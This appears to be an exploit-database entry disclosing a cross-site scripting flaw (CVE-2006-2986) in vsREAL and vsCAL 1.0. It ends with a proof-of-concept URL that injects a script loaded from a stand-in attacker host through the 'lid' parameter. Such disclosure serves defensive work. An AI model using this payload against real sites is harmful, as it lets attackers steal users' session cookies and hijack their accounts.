Baby Katie Media VSReal and VScal 1.0 - 'index.php?lid' Cross-Site Scripting
Author: Luny
type: webapps
platform: php
port:
date_added: 2006-06-09
date_updated: 2013-09-01
verified: 1
codes: CVE-2006-2986;OSVDB-26330
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/18350/info
vsREAL and vSCAL are prone to multiple cross-site scripting vulnerabilities. These issues are due to the applications' failure to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/vscal/index.php?page=showlisting&lid=<SCRIPT%20SRC=evilsite.com//xss.js></SCRIPT>